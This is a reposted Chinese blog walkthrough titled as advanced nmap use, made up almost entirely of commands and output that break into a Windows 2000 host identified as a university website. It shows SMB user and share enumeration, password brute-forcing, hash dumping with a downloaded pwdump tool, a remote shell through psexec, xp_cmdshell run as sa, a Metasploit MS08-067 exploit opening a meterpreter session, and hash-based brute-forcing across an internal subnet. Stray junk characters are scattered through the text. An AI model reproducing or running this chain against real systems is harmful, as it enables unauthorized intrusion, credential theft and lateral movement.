zoukankan      html  css  js  c++  java

  • nmap在实战中的高级应用

    转的,因为是win2K系统,不太具有代表性。

    广西师范网站http://202.103.242.241/
    root@bt:~# nmap -sS -sV 202.103.242.241
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST+ Z)
    Nmap scan report for bogon (202.103.242.241);
    Host is up (0.00048s latency)
    Not shown: 993 closed ports3 ]
    PORT STATE SERVICE VERSION
    135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
    139/tcp open netbios-ssn#
    445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
    1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
    1026/tcp open msrpc Microsoft Windows RPC
    3372/tcp open msdtc?
    3389/tcp open ms-term-serv?.
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
    SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r" n;
    SF:(GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
    SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”))
    SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO$ ]
    SF:ptions,6,”hO\n\x000Z”);
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Service Info: OS: Windows;
    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
    root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本9
    -rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
    -rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
    -rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse,
    -rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
    -rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse1
    -rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse6
    -rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse;
    -rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
    -rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
    -rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
    -rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse:
    -rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse8
    -rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse2
    -rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
    -rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse,
    root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
    //此乃使用脚本扫描远程机器所存在的账户名
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
    Nmap scan report for bogon (202.103.242.241)4 q$ S1 F2 N- M
    Host is up (0.00038s latency).8 U8
    Not shown: 993 closed ports
    PORT STATE SERVICE1
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-enum-users:
    |_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
    Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
    root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
    //查看共享
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
    Nmap scan report for bogon (202.103.242.241)$ O)
    Host is up (0.00035s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS5
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-enum-shares:
    | ADMIN$
    | Anonymous access: <none>
    | C$
    | Anonymous access: <none>
    | IPC$
    |_ Anonymous access: READ
    Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
    root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
    //获取用户密码
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
    Nmap scan report for bogon (202.103.242.2418)
    Host is up (0.00041s latency).
    Not shown: 993 closed ports
    PORT STATE SERVICE3
    135/tcp open msrpc'
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds7
    1025/tcp open NFS-or-IIS9
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:5
    | smb-brute:
    | administrator:<blank> => Login was successful
    |_ test:123456 => Login was successful5 M)
    Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds;
    root@bt:~# wget http://swamp.foofus.net/fizzgig/pwdump/pwdump6-1.7.2-exe-only.tar.bz2//
    root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
    root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
    root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.0012s latency).
    PORT STATE SERVICE4
    135/tcp open msrpc9
    139/tcp open netbios-ssn.
    445/tcp open microsoft-ds
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-pwdump:0
    | Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
    | Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
    | test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
    |_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
    Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
    C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
    -p 123456 -e cmd.exe
    PsExec v1.55 – Execute processes remotely
    Copyright (C) 2001-2004 Mark Russinovich
    Sysinternals – www.sysinternals.com8
    Microsoft Windows 2000 [Version 5.00.2195]
    (C) 版权所有 1985-2000 Microsoft Corp.
    C:\WINNT\system32>ipconfig
    Windows 2000 IP Configuration
    Ethernet adapter 本地连接:
    Connection-specific DNS Suffix . :
    IP Address. . . . . . . . . . . . : 202.103.242.241
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 202.103.1.1
    C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
    root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
    Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST4
    Nmap scan report for bogon (202.103.242.241)
    Host is up (0.00046s latency).
    Not shown: 993 closed ports7
    PORT STATE SERVICE
    135/tcp open msrpc
    139/tcp open netbios-ssn1
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-check-vulns:
    |_ MS08-067: VULNERABLE
    Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds6 w3
    root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
    msf > search ms08
    msf > use exploit/windows/smb/ms08_067_netapi%
    msf exploit(ms08_067_netapi) > show options
    msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
    msf exploit(ms08_067_netapi) > show payloads
    msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
    msf exploit(ms08_067_netapi) > exploit
    meterpreter >
    Background session 2
    msf exploit(ms08_067_netapi) > sessions -l
    root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
    test
    administrator4 Z5 I5 w0 R9 c
    root@bt:/usr/local/share/nmap/scripts# vim password.txt
    44EFCE164AB921CAAAD3B435B51404EE3
    root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
    //利用用户名跟获取的hash尝试对整段内网进行登录2
    Nmap scan report for 192.168.1.105"
    Host is up (0.00088s latency).
    Not shown: 993 closed ports9
    PORT STATE SERVICE.
    135/tcp open msrpc
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    3372/tcp open msdtc
    3389/tcp open ms-term-serv
    MAC Address: 08:00:27:D7:2E:79 (Cadmus Computer Systems)
    Host script results:
    | smb-brute:
    |_ administrator:<blank> => Login was successful(

  • 相关阅读:
    PHP连接MYSQL数据库
    Eclipse读取xml中文乱码问题解决
    JSP
    参考代码案例
    EL和JSTL(2)
    EL和JSTL(1)
    状态管理(之cookie、session、filter、listener)
    一、Servlet
    状态管理(之cookie、session、filter、listener)
    spring
  • 原文地址:https://www.cnblogs.com/vigarbuaa/p/3099665.html
Copyright © 2011-2022 走看看